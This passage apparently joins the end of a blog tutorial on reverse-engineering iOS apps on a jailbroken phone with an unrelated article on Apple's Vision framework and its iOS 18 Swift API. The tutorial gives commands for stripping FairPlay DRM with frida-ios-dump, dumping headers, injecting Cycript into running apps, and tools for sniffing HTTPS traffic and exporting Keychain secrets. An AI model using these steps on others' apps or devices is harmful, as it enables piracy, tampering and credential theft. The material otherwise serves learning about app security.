Although Reveal requires a paid subscription, I personally prefer Reveal; it provides more detailed information on the structure, and the right information panel is almost equivalent to the XCode development environment, allowing for real-time adjustments. Additionally, it will prompt Constraint Errors, which is very helpful for UI layout corrections!
Both of these tools are very helpful in the daily development of your own APP!
After covering the environment setup and the fun parts, let’s get to the main topic!
*The following requires a jailbroken phone
All APPs installed from the App Store have FairPlay DRM protection, commonly known as shell protection. Removing this protection is called “cracking,” so simply extracting the .ipa from the App Store is meaningless and unusable.
*Another tool, Apple Configurator 2, can only extract the still-protected files, which is meaningless, so it won’t be elaborated here. Those interested in using this tool can click here for a tutorial.
Regarding the tools, initially, I used Clutch, but no matter how I tried, it always showed FAILED. After checking the project’s issues, I found that many people had the same problem. It seems that this tool can no longer be used on iOS ≥ 12. There is also an old tool called dumpdecrypted, but I haven’t looked into it.
Here, I use frida-ios-dump, a Python tool for dynamic binary dumping, which is very convenient to use!
First, let’s prepare the environment on the Mac:
sudo pip install frida --upgrade --ignore-installed six (Python 2.X)
sudo pip3 install frida --upgrade --ignore-installed six (Python 3.X)
Then run frida-ps in Terminal; if there are no error messages, the installation was successful!
Environment on the jailbroken phone: install Frida from Cydia (on older devices, choose the “Frida for pre-A12 devices” package).
Once the environment is set up, let’s get started:
1. Connect the phone to the computer with a USB cable.
2. Open a Terminal on the Mac and run iproxy 2222 22 to start forwarding the phone’s SSH port over USB.
3. Ensure the phone and computer are on the same network (e.g., connected to the same Wi-Fi).
4. Open another Terminal and run ssh -p 2222 root@127.0.0.1 (through the port iproxy just forwarded), then enter the SSH password (default is alpine).
5. Run dump.py -l to list the installed/running apps on the phone.
6. Run dump.py APP_NAME_OR_BUNDLE_ID -o OUTPUT_PATH/OUTPUT_FILENAME.ipa. Be sure to specify the output path/filename; otherwise the file goes to the default output path /opt/dump/frida-ios-dump/, and you may run into permission errors or have to move it out of /opt/dump afterwards.
7. Unzip the dumped .ipa and you will see /Payload/APP_NAME.app.
8. Right-click on APP_NAME.app → “Show Package Contents” to browse the APP’s resource directory.
Use the class-dump tool to export all the APP’s (including Framework) .h header file information (only for Objective-C, not effective for Swift projects).
I first tried the original nygard/class-dump tool but failed repeatedly; eventually I succeeded using the rewritten class-dump bundled with AloneMonkey / MonkeyDev.
./class-dump -H APP_PATH/APP_NAME.app -o OUTPUT_PATH
After a successful dump, you can obtain the entire APP’s .h information.
You can use decompilation tools like IDA and Hopper for analysis. Both are paid tools, but Hopper offers a free trial (30 minutes per session).
Drag the obtained APP_NAME.app file directly into Hopper to start the analysis.
However, this is where I stopped, as it requires studying machine code, using class-dump results to infer methods, etc.; it requires very deep skills!
After breaking through with decompilation, you can modify the app’s behavior and repackage it into a new APP.
Image from One Piece
1. Using the free MITM Proxy tool to sniff API network request information
»The APP uses HTTPS transmission, but the data was still stolen.
2. Cycript (with a jailbroken phone) dynamic analysis/injection tool:
1. ssh root@PHONE_IP (the password defaults to alpine).
2. Run ps -e | grep <APP Bundle ID> to find the running APP’s process ID.
3. Run cycript -p <Process ID> to inject the tool into the running APP.
You can then use Objective-C/JavaScript to debug and control it.
For Example:
// Objective-C code block
cy# alert = [[UIAlertView alloc] initWithTitle:@"HIHI" message:@"ZhgChg.li" delegate:nil cancelButtonTitle:@"Cancel" otherButtonTitles:nil]
cy# [alert show]
Injecting a UIAlertView alert into the running APP…
For detailed operations, refer to this article.
3. Lookin / Reveal View UI Layout Tools
Previously introduced, recommending again; also very useful in daily development of your own projects, suggest purchasing and using Reveal.
4. MonkeyDev Integration Tool for dynamically injecting and modifying APPs and repackaging them into new APPs
5. ptoomey3 / Keychain-Dumper for exporting KeyChain content
For detailed operations, refer to this article, but I didn’t succeed. Looking at the project issues, it seems to have become ineffective since iOS ≥ 12.
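For context on what such a tool is actually dumping: apps store secrets through the Security framework’s Keychain API, and those items are what a dumper tries to read on a jailbroken device. A minimal sketch of how an app might write such an item (the service and account names are made up for illustration):

```swift
import Foundation
import Security

// Hypothetical example: how an app might persist an auth token in the Keychain.
let token = Data("my-secret-token".utf8)
let attributes: [String: Any] = [
    kSecClass as String: kSecClassGenericPassword,
    kSecAttrService as String: "li.zhgchg.demo",   // made-up service name
    kSecAttrAccount as String: "authToken",        // made-up account name
    kSecValueData as String: token
]

let status = SecItemAdd(attributes as CFDictionary, nil)
print("Keychain add status: \(status)")            // errSecSuccess (0) on success
```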
This field is a huge rabbit hole that takes a lot of technical depth to master; this article only scratches the surface to give a feel for what reverse engineering is like, so apologies for any shortcomings! It is for academic research only; please don’t use it to do bad things. Personally, I found the whole process and the tooling very interesting, and it gave me a better understanding of APP security!
For any questions or feedback, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
Vision framework review & trying out new Swift API in iOS 18
Photo by BoliviaInteligente
The relationship with Vision Pro is like the relationship between hot dogs and dogs, completely unrelated.
The Vision framework is Apple’s image recognition framework built on machine learning, letting developers implement common image recognition features easily and quickly. Vision was introduced as far back as iOS 11.0+ (2017, the iPhone 8 era) and has been iterated and optimized ever since; starting from iOS 18.0 it integrates with Swift Concurrency for better performance and offers a new Swift-native Vision API that gets the most out of Swift Concurrency.
Features of Vision framework
Played around 6 years ago: Exploring Vision - Automatically Recognizing Faces for App Avatar Cropping (Swift)
This time, in conjunction with WWDC 24 Discover Swift enhancements in the Vision framework Session, revisiting and combining new Swift features to play again.
Apple also has another framework called CoreML, which is a machine learning framework based on On-Device chips. It allows you to train models for objects or documents you want to recognize and use the models directly in the app. Interested friends can also give it a try. (e.g. Real-time article classification, real-time spam message detection …)
Vision v.s. VisionKit:
Vision: Mainly used for image analysis tasks such as face recognition, barcode detection, text recognition, etc. It provides powerful APIs to handle and analyze visual content in static images or videos.
VisionKit: Specifically designed for tasks related to document scanning. It offers a scanner view controller that can be used to scan documents and generate high-quality PDFs or images.
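To make the difference concrete, VisionKit’s side is essentially a ready-made scanner UI. A minimal sketch of presenting it from a view controller (written against the long-available VisionKit API, nothing iOS 18 specific):

```swift
import UIKit
import VisionKit

final class ScanViewController: UIViewController, VNDocumentCameraViewControllerDelegate {
    func startScanning() {
        guard VNDocumentCameraViewController.isSupported else { return }
        let scanner = VNDocumentCameraViewController()
        scanner.delegate = self
        present(scanner, animated: true)
    }

    func documentCameraViewController(_ controller: VNDocumentCameraViewController,
                                      didFinishWith scan: VNDocumentCameraScan) {
        // Each page comes back as a UIImage; it can then be fed to Vision
        // (e.g. a text recognition request) for OCR.
        for index in 0..<scan.pageCount {
            let pageImage = scan.imageOfPage(at: index)
            print("Scanned page \(index): \(pageImage.size)")
        }
        controller.dismiss(animated: true)
    }
}
```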
The Vision framework cannot run in the simulator on Apple Silicon (M1) Macs and can only be tested on a physical device; running in a simulator environment throws a Could not create Espresso context error, and no solution has been found in the official forum discussion.
Since I don’t have a physical iOS 18 device for testing, all the execution results in this article are based on the old (pre-iOS 18) syntax; please leave a comment if there are errors with the new syntax.
Discover Swift enhancements in the Vision framework
This article is a sharing note for WWDC 24 — Discover Swift enhancements in the Vision framework session, along with some experimental insights.
As of iOS 18, it supports 18 languages.
// Supported language list
if #available(iOS 18.0, *) {
    print(RecognizeTextRequest().supportedRecognitionLanguages.map { "\($0.languageCode!)-\(($0.region?.identifier ?? $0.script?.identifier)!)" })
} else {
    print(try! VNRecognizeTextRequest().supportedRecognitionLanguages())
}

// The actual available recognition languages are based on this list.
// Tested on iOS 18, the output is as follows:
// ["en-US", "fr-FR", "it-IT", "de-DE", "es-ES", "pt-BR", "zh-Hans", "zh-Hant", "yue-Hans", "yue-Hant", "ko-KR", "ja-JP", "ru-RU", "uk-UA", "th-TH", "vi-VT", "ar-SA", "ars-SA"]
// The Swedish support mentioned at WWDC was not seen; unsure if it has not been released yet or if it depends on the device's region and language settings
WWDC provided three example images (of the same image quality) to illustrate the following.
iOS ≥ 18 New API: CalculateImageAestheticsScoresRequest
let request = CalculateImageAestheticsScoresRequest()
let result = try await request.perform(on: URL(string: "https://zhgchg.li/assets/cb65fd5ab770/1*yL3vI1ADzwlovctW5WQgJw.jpeg")!)

// Photo score
print(result.overallScore)

// Whether it is judged as a utility image
print(result.isUtility)
In the past, only body pose and hand pose could be detected separately.
With this update, developers can detect both body and hand poses simultaneously, combining them into a single request and result, making it more convenient for further feature development.
iOS ≥ 18 New API: DetectHumanBodyPoseRequest
var request = DetectHumanBodyPoseRequest()
// Detect hand pose together
request.detectsHands = true

guard let bodyPose = try await request.perform(on: image).first else { return }

// Body Pose Joints
let bodyJoints = bodyPose.allJoints()
// Left hand Pose Joints
let leftHandJoints = bodyPose.leftHand.allJoints()
// Right hand Pose Joints
let rightHandJoints = bodyPose.rightHand.allJoints()
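Note that joint positions come back in Vision’s normalized coordinate space (0 to 1, origin at the bottom left), so they usually need converting before drawing. A sketch using the pre-iOS 18 types (the confidence threshold is an arbitrary value for illustration):

```swift
import Vision
import CoreGraphics

// Pre-iOS 18 sketch: locate the nose in an image and convert the normalized
// point into pixel coordinates of the analyzed CGImage.
func nosePosition(in cgImage: CGImage) throws -> CGPoint? {
    let request = VNDetectHumanBodyPoseRequest()
    let handler = VNImageRequestHandler(cgImage: cgImage, options: [:])
    try handler.perform([request])

    guard let observation = (request.results as? [VNHumanBodyPoseObservation])?.first else {
        return nil
    }
    let nose = try observation.recognizedPoint(.nose)
    guard nose.confidence > 0.3 else { return nil }   // arbitrary threshold

    // Convert Vision's normalized coordinates to pixel coordinates.
    return VNImagePointForNormalizedPoint(nose.location, cgImage.width, cgImage.height)
}
```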
In this update Apple provides new Swift-native Vision API wrappers for developers: besides covering the existing functionality, they focus on Swift 6 / Swift Concurrency, offering a more efficient and more Swift-like way to use the API.
The speaker here reintroduced the basic usage of the Vision framework. Apple has encapsulated 31 types of common image recognition requests and their corresponding “Observation” objects (as of iOS 18).
Request: DetectFaceRectanglesRequest (face area recognition) -> Result: FaceObservation. The previous article “Exploring Vision - Automatically Identify Faces for Avatar Upload in Apps (Swift)” used this pair of requests.
Request: RecognizeTextRequest (text recognition) -> Result: RecognizedTextObservation
Request: GenerateObjectnessBasedSaliencyImageRequest (objectness-based object recognition) -> Result: SaliencyImageObservation
Request & Purpose | Observation & Description |
---|---|
CalculateImageAestheticsScoresRequest Calculate the aesthetic score of the image. | AestheticsObservation Returns the aesthetic score of the image, considering factors like composition and color. |
ClassifyImageRequest Classify the content of the image. | ClassificationObservation Returns the classification labels and confidence of objects or scenes in the image. |
CoreMLRequest Analyze images using Core ML models. | CoreMLFeatureValueObservation Generates observations based on the output of Core ML models. |
DetectAnimalBodyPoseRequest Detect animal poses in images. | RecognizedPointsObservation Returns the skeleton points and their positions of animals. |
DetectBarcodesRequest Detect barcodes in images. | BarcodeObservation Returns barcode data and types (e.g., QR code). |
DetectContoursRequest Detect contours in images. | ContoursObservation Returns detected contour lines in the image. |
DetectDocumentSegmentationRequest Detect and segment documents in images. | RectangleObservation Returns the rectangular boundary positions of documents. |
DetectFaceCaptureQualityRequest Evaluate the quality of face captures. | FaceObservation Returns quality assessment scores for facial images. |
DetectFaceLandmarksRequest Detect facial landmarks. | FaceObservation Returns detailed positions of facial landmarks (e.g., eyes, nose). |
DetectFaceRectanglesRequest Detect faces in images. | FaceObservation Returns the bounding box positions of faces. |
DetectHorizonRequest Detect horizons in images. | HorizonObservation Returns the angle and position of the horizon. |
DetectHumanBodyPose3DRequest Detect 3D human body poses in images. | RecognizedPointsObservation Returns 3D human skeleton points and their spatial coordinates. |
DetectHumanBodyPoseRequest Detect human body poses in images. | RecognizedPointsObservation Returns human skeleton points and their coordinates. |
DetectHumanHandPoseRequest Detect hand poses in images. | RecognizedPointsObservation Returns hand skeleton points and their positions. |
DetectHumanRectanglesRequest Detect humans in images. | HumanObservation Returns the bounding box positions of humans. |
DetectRectanglesRequest Detect rectangles in images. | RectangleObservation Returns the coordinates of the four vertices of rectangles. |
DetectTextRectanglesRequest Detect text regions in images. | TextObservation Returns the positions and bounding boxes of text regions. |
DetectTrajectoriesRequest Detect and analyze object motion trajectories. | TrajectoryObservation Returns motion trajectory points and their time series. |
GenerateAttentionBasedSaliencyImageRequest Generate attention-based saliency images. | SaliencyImageObservation Returns saliency maps of the most attractive areas in the image. |
GenerateForegroundInstanceMaskRequest Generate foreground instance mask images. | InstanceMaskObservation Returns masks of foreground objects. |
GenerateImageFeaturePrintRequest Generate image feature prints for comparison. | FeaturePrintObservation Returns feature fingerprint data of images for similarity comparison. |
GenerateObjectnessBasedSaliencyImageRequest Generate objectness-based saliency images. | SaliencyImageObservation Returns saliency maps of object saliency areas. |
GeneratePersonInstanceMaskRequest Generate person instance mask images. | InstanceMaskObservation Returns masks of person instances. |
GeneratePersonSegmentationRequest Generate person segmentation images. | SegmentationObservation Returns binary images of person segmentation. |
RecognizeAnimalsRequest Detect and identify animals in images. | RecognizedObjectObservation Returns animal types and their confidence levels. |
RecognizeTextRequest Detect and identify text in images. | RecognizedTextObservation Returns detected text content and its spatial positions. |
TrackHomographicImageRegistrationRequest Track homographic image registration. | ImageAlignmentObservation Returns homographic transformation matrices between images for image registration. |
TrackObjectRequest Track objects in images. | DetectedObjectObservation Returns the positions and velocity information of objects in images. |
TrackOpticalFlowRequest Track optical flow in images. | OpticalFlowObservation Returns optical flow vector fields describing pixel movements. |
TrackRectangleRequest Track rectangles in images. | RectangleObservation Returns the positions, sizes, and rotation angles of rectangles in images. |
TrackTranslationalImageRegistrationRequest Track translational image registration. | ImageAlignmentObservation Returns translational transformation matrices between images for image registration. |
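As a concrete example of the CoreMLRequest row above, the pre-iOS 18 API wraps a compiled Core ML model like this (a sketch only: YourMLModel stands in for whatever class Xcode generated for an .mlmodel in your project):

```swift
import Vision
import CoreML

// Sketch: classify an image with a Core ML model wrapped in a Vision request.
func classify(cgImage: CGImage) throws {
    let coreMLModel = try YourMLModel(configuration: MLModelConfiguration()).model // placeholder model class
    let visionModel = try VNCoreMLModel(for: coreMLModel)

    let request = VNCoreMLRequest(model: visionModel) { request, error in
        guard let observations = request.results as? [VNClassificationObservation] else { return }
        observations.prefix(5).forEach { print("\($0.identifier): \($0.confidence)") }
    }
    request.imageCropAndScaleOption = .centerCrop

    let handler = VNImageRequestHandler(cgImage: cgImage, options: [:])
    try handler.perform([request])
}
```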
The speaker mentioned several commonly used Requests as follows.
ClassifyImageRequest: recognizes the input image and returns classification labels with confidence scores.
[Travelogue] 2024 Second Visit to Kyushu 9-Day Free and Easy Trip, Entering Fukuoka by Busan→Hakata Cruise
if #available(iOS 18.0, *) {
    // New API using Swift features
    let request = ClassifyImageRequest()
    Task {
        do {
            let observations = try await request.perform(on: URL(string: "https://zhgchg.li/assets/cb65fd5ab770/1*yL3vI1ADzwlovctW5WQgJw.jpeg")!)
            observations.forEach { observation in
                print("\(observation.identifier): \(observation.confidence)")
            }
        } catch {
            print("Request failed: \(error)")
        }
    }
} else {
    // Old method
    let completionHandler: VNRequestCompletionHandler = { request, error in
        guard error == nil else {
            print("Request failed: \(String(describing: error))")
            return
        }
        guard let observations = request.results as? [VNClassificationObservation] else {
            return
        }
        observations.forEach { observation in
            print("\(observation.identifier): \(observation.confidence)")
        }
    }

    let request = VNClassifyImageRequest(completionHandler: completionHandler)
    DispatchQueue.global().async {
        let handler = VNImageRequestHandler(url: URL(string: "https://zhgchg.li/assets/cb65fd5ab770/1*3_jdrLurFuUfNdW4BJaRww.jpeg")!, options: [:])
        do {
            try handler.perform([request])
        } catch {
            print("Request failed: \(error)")
        }
    }
}
Analysis Results:
• outdoor: 0.75392926
• sky: 0.75392926
• blue_sky: 0.7519531
• machine: 0.6958008
• cloudy: 0.26538086
• structure: 0.15728651
• sign: 0.14224191
• fence: 0.118652344
• banner: 0.0793457
• material: 0.075975396
• plant: 0.054406323
• foliage: 0.05029297
• light: 0.048126098
• lamppost: 0.048095703
• billboards: 0.040039062
• art: 0.03977703
• branch: 0.03930664
• decoration: 0.036868922
• flag: 0.036865234
... etc.
RecognizeTextRequest: recognizes the text content in an image (a.k.a. OCR).
[Travelogue] 2023 Tokyo 5-Day Free and Easy Trip
if #available(iOS 18.0, *) {
    // New API using Swift features
    var request = RecognizeTextRequest()
    request.recognitionLevel = .accurate
    request.recognitionLanguages = [.init(identifier: "ja-JP"), .init(identifier: "en-US")] // Specify recognition languages by language code (here Japanese and English)
    Task {
        do {
            let observations = try await request.perform(on: URL(string: "https://zhgchg.li/assets/9da2c51fa4f2/1*fBbNbDepYioQ-3-0XUkF6Q.jpeg")!)
            observations.forEach { observation in
                let topCandidate = observation.topCandidates(1).first
                print(topCandidate?.string ?? "No text recognized")
            }
        } catch {
            print("Request failed: \(error)")
        }
    }
} else {
    // Old way
    let completionHandler: VNRequestCompletionHandler = { request, error in
        guard error == nil else {
            print("Request failed: \(String(describing: error))")
            return
        }
        guard let observations = request.results as? [VNRecognizedTextObservation] else {
            return
        }
        observations.forEach { observation in
            let topCandidate = observation.topCandidates(1).first
            print(topCandidate?.string ?? "No text recognized")
        }
    }

    let request = VNRecognizeTextRequest(completionHandler: completionHandler)
    request.recognitionLevel = .accurate
    request.recognitionLanguages = ["ja-JP", "en-US"] // Specify recognition languages by language code (here Japanese and English)
    DispatchQueue.global().async {
        let handler = VNImageRequestHandler(url: URL(string: "https://zhgchg.li/assets/9da2c51fa4f2/1*fBbNbDepYioQ-3-0XUkF6Q.jpeg")!, options: [:])
        do {
            try handler.perform([request])
        } catch {
            print("Request failed: \(error)")
        }
    }
}
Analysis Result:
LE LABO Aoyama Store
TEL:03-6419-7167
*Thank you for your purchase*
No: 21347
Date: 2023/06/10 14.14.57
Responsible:
1690370
Register: 008A 1
Product Name
Tax-inclusive Price Quantity Tax-inclusive Total
Kaiak 10 EDP FB 15ML
J1P7010000S
16,800
16,800
Another 13 EDP FB 15ML
J1PJ010000S
10,700
10,700
Lip Balm 15ML
JOWC010000S
2,000
1
Total Amount
(Tax Included)
CARD
2,000
3 items purchased
29,500
0
29,500
29,500
Detect barcode and QR code data in the image.
Thai locals recommend Goose Brand Cooling Gel
let filePath = Bundle.main.path(forResource: "IMG_6777", ofType: "png")! // Local test image
let fileURL = URL(filePath: filePath)
if #available(iOS 18.0, *) {
    // New API using Swift features
    let request = DetectBarcodesRequest()
    Task {
        do {
            let observations = try await request.perform(on: fileURL)
            observations.forEach { observation in
                print("Payload: \(observation.payloadString ?? "No payload")")
                print("Symbology: \(observation.symbology)")
            }
        } catch {
            print("Request failed: \(error)")
        }
    }
} else {
    // Old way
    let completionHandler: VNRequestCompletionHandler = { request, error in
        guard error == nil else {
            print("Request failed: \(String(describing: error))")
            return
        }
        guard let observations = request.results as? [VNBarcodeObservation] else {
            return
        }
        observations.forEach { observation in
            print("Payload: \(observation.payloadStringValue ?? "No payload")")
            print("Symbology: \(observation.symbology.rawValue)")
        }
    }

    let request = VNDetectBarcodesRequest(completionHandler: completionHandler)
    DispatchQueue.global().async {
        let handler = VNImageRequestHandler(url: fileURL, options: [:])
        do {
            try handler.perform([request])
        } catch {
            print("Request failed: \(error)")
        }
    }
}
Analysis Results:
Payload: 8859126000911
Symbology: VNBarcodeSymbologyEAN13
Payload: https://lin.ee/hGynbVM
Symbology: VNBarcodeSymbologyQR
Payload: http://www.hongthaipanich.com/
Symbology: VNBarcodeSymbologyQR
Payload: https://www.facebook.com/qr?id=100063856061714
Symbology: VNBarcodeSymbologyQR
Recognize animals in the image with confidence.
let filePath = Bundle.main.path(forResource: "IMG_5026", ofType: "png")! // Local test image
let fileURL = URL(filePath: filePath)
if #available(iOS 18.0, *) {
    // New API using Swift features
    let request = RecognizeAnimalsRequest()
    Task {
        do {
            let observations = try await request.perform(on: fileURL)
            observations.forEach { observation in
                let labels = observation.labels
                labels.forEach { label in
                    print("Detected animal: \(label.identifier) with confidence: \(label.confidence)")
                }
            }
        } catch {
            print("Request failed: \(error)")
        }
    }
} else {
    // Old way
    let completionHandler: VNRequestCompletionHandler = { request, error in
        guard error == nil else {
            print("Request failed: \(String(describing: error))")
            return
        }
        guard let observations = request.results as? [VNRecognizedObjectObservation] else {
            return
        }
        observations.forEach { observation in
            let labels = observation.labels
            labels.forEach { label in
                print("Detected animal: \(label.identifier) with confidence: \(label.confidence)")
            }
        }
    }

    let request = VNRecognizeAnimalsRequest(completionHandler: completionHandler)
    DispatchQueue.global().async {
        let handler = VNImageRequestHandler(url: fileURL, options: [:])
        do {
            try handler.perform([request])
        } catch {
            print("Request failed: \(error)")
        }
    }
}
Analysis Results:
Detected animal: Cat with confidence: 0.77245045
VN*Request -> *Request (e.g. VNDetectBarcodesRequest -> DetectBarcodesRequest)
VN*Observation -> *Observation (e.g. VNRecognizedObjectObservation -> RecognizedObjectObservation)
VNRequestCompletionHandler -> async/await
VNImageRequestHandler.perform([VN*Request]) -> *Request.perform()
The official WWDC video uses a supermarket product scanner as an example.
We can obtain the location of the Barcode from observation.boundingBox, but unlike the common UIView coordinate system, the BoundingBox's relative position starts from the lower-left corner, with values normalized to the range 0 to 1.
let filePath = Bundle.main.path(forResource: "IMG_6785", ofType: "png")! // Local test image
let fileURL = URL(filePath: filePath)
if #available(iOS 18.0, *) {
    // New API using Swift features
    var request = DetectBarcodesRequest()
    request.symbologies = [.ean13] // If only scanning EAN13 Barcode is needed, it can be specified directly to improve performance
    Task {
        do {
            let observations = try await request.perform(on: fileURL)
            if let observation = observations.first {
                DispatchQueue.main.async {
                    self.infoLabel.text = observation.payloadString
                    // Color layer marking
                    let colorLayer = CALayer()
                    // iOS >=18 new coordinate transformation API toImageCoordinates
                    // Not tested, may need to calculate the offset for ContentMode = AspectFit:
                    colorLayer.frame = observation.boundingBox.toImageCoordinates(self.baseImageView.frame.size, origin: .upperLeft)
                    colorLayer.backgroundColor = UIColor.red.withAlphaComponent(0.5).cgColor
                    self.baseImageView.layer.addSublayer(colorLayer)
                }
                print("BoundingBox: \(observation.boundingBox.cgRect)")
                print("Payload: \(observation.payloadString ?? "No payload")")
                print("Symbology: \(observation.symbology)")
            }
        } catch {
            print("Request failed: \(error)")
        }
    }
} else {
    // Old approach
    let completionHandler: VNRequestCompletionHandler = { request, error in
        guard error == nil else {
            print("Request failed: \(String(describing: error))")
            return
        }
        guard let observations = request.results as? [VNBarcodeObservation] else {
            return
        }
        if let observation = observations.first {
            DispatchQueue.main.async {
                self.infoLabel.text = observation.payloadStringValue
                // Color layer marking
                let colorLayer = CALayer()
                colorLayer.frame = self.convertBoundingBox(observation.boundingBox, to: self.baseImageView)
                colorLayer.backgroundColor = UIColor.red.withAlphaComponent(0.5).cgColor
                self.baseImageView.layer.addSublayer(colorLayer)
            }
            print("BoundingBox: \(observation.boundingBox)")
            print("Payload: \(observation.payloadStringValue ?? "No payload")")
            print("Symbology: \(observation.symbology.rawValue)")
        }
    }

    let request = VNDetectBarcodesRequest(completionHandler: completionHandler)
    request.symbologies = [.ean13] // If only scanning EAN13 Barcode is needed, it can be specified directly to improve performance
    DispatchQueue.global().async {
        let handler = VNImageRequestHandler(url: fileURL, options: [:])
        do {
            try handler.perform([request])
        } catch {
            print("Request failed: \(error)")
        }
    }
}
iOS ≥ 18 Update Highlight:
// iOS ≥18 New Coordinate Transformation API toImageCoordinates
observation.boundingBox.toImageCoordinates(CGSize, origin: .upperLeft)
// https://developer.apple.com/documentation/vision/normalizedpoint/toimagecoordinates(from:imagesize:origin:)
Helper:
// Generated by ChatGPT 4o
// Since the photo in the ImageView is set with ContentMode = AspectFit
// Extra calculation is needed for the top and bottom offset caused by Fit
func convertBoundingBox(_ boundingBox: CGRect, to view: UIImageView) -> CGRect {
    guard let image = view.image else {
        return .zero
    }

    let imageSize = image.size
    let viewSize = view.bounds.size
    let imageRatio = imageSize.width / imageSize.height
    let viewRatio = viewSize.width / viewSize.height
    var scaleFactor: CGFloat
    var offsetX: CGFloat = 0
    var offsetY: CGFloat = 0
    if imageRatio > viewRatio {
        // Image fits in the width direction
        scaleFactor = viewSize.width / imageSize.width
        offsetY = (viewSize.height - imageSize.height * scaleFactor) / 2
    } else {
        // Image fits in the height direction
        scaleFactor = viewSize.height / imageSize.height
        offsetX = (viewSize.width - imageSize.width * scaleFactor) / 2
    }

    let x = boundingBox.minX * imageSize.width * scaleFactor + offsetX
    let y = (1 - boundingBox.maxY) * imageSize.height * scaleFactor + offsetY
    let width = boundingBox.width * imageSize.width * scaleFactor
    let height = boundingBox.height * imageSize.height * scaleFactor
    return CGRect(x: x, y: y, width: width, height: height)
}
Output:
BoundingBox: (0.5295758928571429, 0.21408638121589782, 0.0943080357142857, 0.21254415360708087)
Payload: 4710018183805
Symbology: VNBarcodeSymbologyEAN13
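To make the lower-left-origin convention concrete, here is a small worked example using the same arithmetic as convertBoundingBox above; the 1000x1000 image size is hypothetical and the box values are rounded from the output:

import CoreGraphics

// Hypothetical sanity check, assuming a 1000x1000 px image displayed 1:1 (scaleFactor = 1, no AspectFit offsets).
let boundingBox = CGRect(x: 0.5296, y: 0.2141, width: 0.0943, height: 0.2125) // normalized, origin at lower-left
let imageSize = CGSize(width: 1000, height: 1000)

let x = boundingBox.minX * imageSize.width        // 529.6
let y = (1 - boundingBox.maxY) * imageSize.height // (1 - 0.4266) * 1000 = 573.4, flipped to UIKit's top-left origin
let width = boundingBox.width * imageSize.width   // 94.3
let height = boundingBox.height * imageSize.height // 212.5
print(CGRect(x: x, y: y, width: width, height: height))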
Therefore, our scanner also needs to support scanning pure text labels simultaneously.
let filePath = Bundle.main.path(forResource: "apple", ofType: "jpg")! // Local test image
let fileURL = URL(filePath: filePath)
if #available(iOS 18.0, *) {
    // New API using Swift features
    var barcodesRequest = DetectBarcodesRequest()
    barcodesRequest.symbologies = [.ean13] // If only scanning EAN13 Barcode is needed, it can be specified directly to improve performance
    var textRequest = RecognizeTextRequest()
    textRequest.recognitionLanguages = [.init(identifier: "zh-Hant"), .init(identifier: "en-US")]
    Task {
        do {
            let handler = ImageRequestHandler(fileURL)
            // Parameter pack syntax; we must wait for all requests to finish before we can use their results.
            // let (barcodesObservation, textObservation, ...) = try await handler.perform(barcodesRequest, textRequest, ...)
            let (barcodesObservation, textObservation) = try await handler.perform(barcodesRequest, textRequest)
            if let observation = barcodesObservation.first {
                DispatchQueue.main.async {
                    self.infoLabel.text = observation.payloadString
                    // Color layer
                    let colorLayer = CALayer()
                    // New Coordinate Transformation API toImageCoordinates for iOS >=18
                    // Not tested, may need to consider the offset of ContentMode = AspectFit:
                    colorLayer.frame = observation.boundingBox.toImageCoordinates(self.baseImageView.frame.size, origin: .upperLeft)
                    colorLayer.backgroundColor = UIColor.red.withAlphaComponent(0.5).cgColor
                    self.baseImageView.layer.addSublayer(colorLayer)
                }
                print("BoundingBox: \(observation.boundingBox.cgRect)")
                print("Payload: \(observation.payloadString ?? "No payload")")
                print("Symbology: \(observation.symbology)")
            }
            textObservation.forEach { observation in
                let topCandidate = observation.topCandidates(1).first
                print(topCandidate?.string ?? "No text recognized")
            }
        } catch {
            print("Request failed: \(error)")
        }
    }
} else {
    // Old approach
    let barcodesCompletionHandler: VNRequestCompletionHandler = { request, error in
        guard error == nil else {
            print("Request failed: \(String(describing: error))")
            return
        }
        guard let observations = request.results as? [VNBarcodeObservation] else {
            return
        }
        if let observation = observations.first {
            DispatchQueue.main.async {
                self.infoLabel.text = observation.payloadStringValue
                // Color layer
                let colorLayer = CALayer()
                colorLayer.frame = self.convertBoundingBox(observation.boundingBox, to: self.baseImageView)
                colorLayer.backgroundColor = UIColor.red.withAlphaComponent(0.5).cgColor
                self.baseImageView.layer.addSublayer(colorLayer)
            }
            print("BoundingBox: \(observation.boundingBox)")
            print("Payload: \(observation.payloadStringValue ?? "No payload")")
            print("Symbology: \(observation.symbology.rawValue)")
        }
    }

    let textCompletionHandler: VNRequestCompletionHandler = { request, error in
        guard error == nil else {
            print("Request failed: \(String(describing: error))")
            return
        }
        guard let observations = request.results as? [VNRecognizedTextObservation] else {
            return
        }
        observations.forEach { observation in
            let topCandidate = observation.topCandidates(1).first
            print(topCandidate?.string ?? "No text recognized")
        }
    }

    let barcodesRequest = VNDetectBarcodesRequest(completionHandler: barcodesCompletionHandler)
    barcodesRequest.symbologies = [.ean13] // If only scanning EAN13 Barcode is needed, it can be specified directly to improve performance
    let textRequest = VNRecognizeTextRequest(completionHandler: textCompletionHandler)
    textRequest.recognitionLevel = .accurate
    textRequest.recognitionLanguages = ["en-US"]
    DispatchQueue.global().async {
        let handler = VNImageRequestHandler(url: fileURL, options: [:])
        do {
            try handler.perform([barcodesRequest, textRequest])
        } catch {
            print("Request failed: \(error)")
        }
    }
}
Output:
94128s
ORGANIC
Pink Lady®
Produce of USh
iOS ≥ 18 Update Highlight:
let handler = ImageRequestHandler(fileURL)
// Parameter pack syntax; we must wait for all requests to finish before we can use their results.
// let (barcodesObservation, textObservation, ...) = try await handler.perform(barcodesRequest, textRequest, ...)
let (barcodesObservation, textObservation) = try await handler.perform(barcodesRequest, textRequest)
The perform(barcodesRequest, textRequest) call above, which handles barcode scanning and text recognition together, requires both requests to complete before execution continues. Starting from iOS 18, a new performAll() method is provided that turns the response into a stream, so each result can be handled as soon as it arrives, for example responding immediately when a barcode is scanned.
if #available(iOS 18.0, *) {
    // New API using Swift features
    var barcodesRequest = DetectBarcodesRequest()
    barcodesRequest.symbologies = [.ean13] // If only scanning EAN13 Barcodes is needed, it can be specified directly to improve performance
    var textRequest = RecognizeTextRequest()
    textRequest.recognitionLanguages = [.init(identifier: "zh-Hant"), .init(identifier: "en-US")]
    Task {
        let handler = ImageRequestHandler(fileURL)
        let observation = handler.performAll([barcodesRequest, textRequest] as [any VisionRequest])
        for try await result in observation {
            switch result {
            case .detectBarcodes(_, let barcodesObservation):
                if let observation = barcodesObservation.first {
                    DispatchQueue.main.async {
                        self.infoLabel.text = observation.payloadString
                        // Color layer marking
                        let colorLayer = CALayer()
